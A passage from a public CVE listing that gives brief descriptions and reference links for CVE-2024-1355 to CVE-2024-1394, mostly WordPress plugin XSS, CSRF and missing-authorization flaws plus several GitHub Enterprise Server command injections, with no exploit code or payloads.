MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/testimonial/index.php#L124 | URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/testimonial/index.php#L124 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048999%40ht-mega-for-elementor&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048999%40ht-mega-for-elementor&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve Assigned (20240209)
CVE 2024 1394 Candidate A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them. MISC:RHBZ#2262921 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2262921 | MISC:RHSA-2024:1462 | URL:https://access.redhat.com/errata/RHSA-2024:1462 | MISC:RHSA-2024:1468 | URL:https://access.redhat.com/errata/RHSA-2024:1468 | MISC:RHSA-2024:1472 | URL:https://access.redhat.com/errata/RHSA-2024:1472 | MISC:RHSA-2024:1501 | URL:https://access.redhat.com/errata/RHSA-2024:1501 | MISC:RHSA-2024:1502 | URL:https://access.redhat.com/errata/RHSA-2024:1502 | MISC:https://access.redhat.com/security/cve/CVE-2024-1394 | URL:https://access.redhat.com/security/cve/CVE-2024-1394 | MISC:https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6 | URL:https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6 Assigned (20240209)
CVE 2024 1393 Candidate The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'icon_align' attribute of the Content Switcher widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/content-switcher/skins/skin-3.php#L39 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/content-switcher/skins/skin-3.php#L39 | MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/content-switcher/skins/skin-3.php#L39 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/content-switcher/skins/skin-3.php#L39 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bb0888d6-30e6-4957-b270-1968eace462e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bb0888d6-30e6-4957-b270-1968eace462e?source=cve Assigned (20240208)
CVE 2024 1392 Candidate The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button1_icon' attribute of the Dual Button widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/dual-button/widgets/dual-button.php#L885 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/dual-button/widgets/dual-button.php#L885 | MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/dual-button/widgets/dual-button.php#L885 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/dual-button/widgets/dual-button.php#L885 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve Assigned (20240208)
CVE 2024 1391 Candidate The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘eae_custom_overlay_switcher’ attribute of the Thumbnail Slider widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/bg-slider/module.php#L255 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/bg-slider/module.php#L255 | MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/bg-slider/module.php#L255 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/bg-slider/module.php#L255 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/977bab12-969d-4b15-9942-2b17c8541f61?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/977bab12-969d-4b15-9942-2b17c8541f61?source=cve Assigned (20240208)
CVE 2024 1390 Candidate The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the creating_pricing_table_page function in all versions up to, and including, 2.11.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create pricing tables. MISC:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/admin/class-admin-subscription-plans.php#L477 | URL:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/admin/class-admin-subscription-plans.php#L477 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve Assigned (20240208)
CVE 2024 1389 Candidate The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pms_stripe_connect_handle_authorization_return function in all versions up to, and including, 2.11.1. This makes it possible for unauthenticated attackers to change the Stripe payment keys. MISC:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/gateways/stripe/admin/functions-admin-connect.php#L11 | URL:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/gateways/stripe/admin/functions-admin-connect.php#L11 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve Assigned (20240208)
CVE 2024 1388 Candidate The Yuki theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_customizer_options() function in all versions up to, and including, 1.3.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to reset the theme's settings. MISC:https://themes.trac.wordpress.org/changeset/217428/yuki/1.3.14/inc/extensions/class-reset-extension.php | URL:https://themes.trac.wordpress.org/changeset/217428/yuki/1.3.14/inc/extensions/class-reset-extension.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d964e0ef-f14e-463b-bf4e-3f25788df03c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d964e0ef-f14e-463b-bf4e-3f25788df03c?source=cve Assigned (20240208)
CVE 2024 1383 Candidate The WPvivid Backup for MainWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 0.9.32 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/wpvivid-backup-mainwp/trunk/wpvivid-backup-mainwp.php#L525 | URL:https://plugins.trac.wordpress.org/browser/wpvivid-backup-mainwp/trunk/wpvivid-backup-mainwp.php#L525 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve Assigned (20240208)
CVE 2024 1382 Candidate The Restaurant Reservations plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the nd_rst_layout attribute of the nd_rst_search shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where an uploaded PHP file may not be directly accessible. MISC:https://plugins.trac.wordpress.org/browser/nd-restaurant-reservations/trunk/addons/visual/search/index.php#L49 | URL:https://plugins.trac.wordpress.org/browser/nd-restaurant-reservations/trunk/addons/visual/search/index.php#L49 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d51db160-c701-426d-890f-73cc4785cad8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d51db160-c701-426d-890f-73cc4785cad8?source=cve Assigned (20240208)
CVE 2024 1381 Candidate The Page Builder Sandwich – Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and higher, to extract sensitive user or configuration data. MISC:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/trunk/class-inspector.php#L90 | URL:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/trunk/class-inspector.php#L90 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve Assigned (20240208)
CVE 2024 1380 Candidate The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve Assigned (20240208)
CVE 2024 1379 Candidate The Website Article Monetization By MageNet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'abp_auth_key' parameter in all versions up to, and including, 1.0.11 due to insufficient input sanitization and output escaping and a missing authorization check. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/website-article-monetization-by-magenet/trunk/admin/article-backlinks-admin.php#L110 | URL:https://plugins.trac.wordpress.org/browser/website-article-monetization-by-magenet/trunk/admin/article-backlinks-admin.php#L110 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b8564dbb-6be8-4999-be65-d28609e05451?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b8564dbb-6be8-4999-be65-d28609e05451?source=cve Assigned (20240208)
CVE 2024 1378 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via nomad templates when configuring SMTP options. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com . MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240208)
CVE 2024 1377 Candidate The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘author_meta_tag’ attribute of the Author Meta widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons | URL:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve Assigned (20240208)
CVE 2024 1374 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via nomad templates when configuring audit log forwarding. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com . MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240208)
CVE 2024 1373 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-46209. Reason: This candidate is a duplicate of CVE-2023-46209. Notes: All CVE users should reference CVE-2023-46209 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240208)
CVE 2024 1372 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when configuring SAML settings. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com . MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240208)
CVE 2024 1370 Candidate The Maintenance Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the subscribe_download function hooked via AJAX action in all versions up to, and including, 1.0.8. This makes it possible for authenticated attackers, with subscriber access or higher, to download a csv containing subscriber emails. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve Assigned (20240208)
CVE 2024 1369 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when setting the username and password for collectd configurations. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com . MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240208)
CVE 2024 1368 Candidate The Page Duplicator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the duplicate_dat_page() function in all versions up to, and including, 0.1.1. This makes it possible for unauthenticated attackers to duplicate arbitrary posts and pages. MISC:https://plugins.trac.wordpress.org/browser/wp-page-duplicator/trunk/page-duplicator.php#L136 | URL:https://plugins.trac.wordpress.org/browser/wp-page-duplicator/trunk/page-duplicator.php#L136 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve Assigned (20240208)
CVE 2024 1367 Candidate A command injection vulnerability exists where an authenticated, remote attacker with administrator privileges on the Security Center application could modify Logging parameters, which could lead to the execution of arbitrary code on the Security Center host. MISC:https://www.tenable.com/security/tns-2024-02 | URL:https://www.tenable.com/security/tns-2024-02 Assigned (20240208)
CVE 2024 1366 Candidate The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘archive_title_tag’ attribute of the Archive Title widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons | URL:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve Assigned (20240208)
CVE 2024 1365 Candidate The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the feed_id parameter in all versions up to, and including, 4.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve Assigned (20240208)
CVE 2024 1363 Candidate The Easy Accordion – Best Accordion FAQ Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'accordion_content_source' attribute in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve Assigned (20240208)
CVE 2024 1362 Candidate The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the cp_shortcode_refresh() function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/src/PageBuilder.php | URL:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/src/PageBuilder.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve Assigned (20240208)
CVE 2024 1361 Candidate The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the apiCall() function. This makes it possible for unauthenticated attackers to call a limited set of functions that can be used to import images, delete posts, or save theme data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/extend-builder/api/api.php | URL:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/extend-builder/api/api.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve Assigned (20240208)
CVE 2024 1360 Candidate The Colibri WP theme for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.94. This is due to missing or incorrect nonce validation on the colibriwp_install_plugin() function. This makes it possible for unauthenticated attackers to install recommended plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://themes.trac.wordpress.org/changeset/218308/colibri-wp/1.0.101/inc/src/PluginsManager.php | URL:https://themes.trac.wordpress.org/changeset/218308/colibri-wp/1.0.101/inc/src/PluginsManager.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/db56844f-9988-4f6a-ba1d-f190ff009f2b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/db56844f-9988-4f6a-ba1d-f190ff009f2b?source=cve Assigned (20240208)
CVE 2024 1359 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when setting up an HTTP proxy. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com . MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240208)
CVE 2024 1358 Candidate The Elementor Addon Elements plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.12.12 via the render function. This makes it possible for authenticated attackers, with contributor access or higher, to include the contents of arbitrary PHP files on the server, which may expose sensitive information. MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/shape-separator/widgets/shape-separator.php#L89 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/shape-separator/widgets/shape-separator.php#L89 | MISC:https://plugins.trac.wordpress.org/changeset/3037925/addon-elements-for-elementor-page-builder/trunk/modules/shape-separator/widgets/shape-separator.php | URL:https://plugins.trac.wordpress.org/changeset/3037925/addon-elements-for-elementor-page-builder/trunk/modules/shape-separator/widgets/shape-separator.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/20cd3fff-0488-4bc2-961b-2427925e6a96?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/20cd3fff-0488-4bc2-961b-2427925e6a96?source=cve Assigned (20240208)
CVE 2024 1355 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via the actions-console docker container while setting a service URL. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240208)
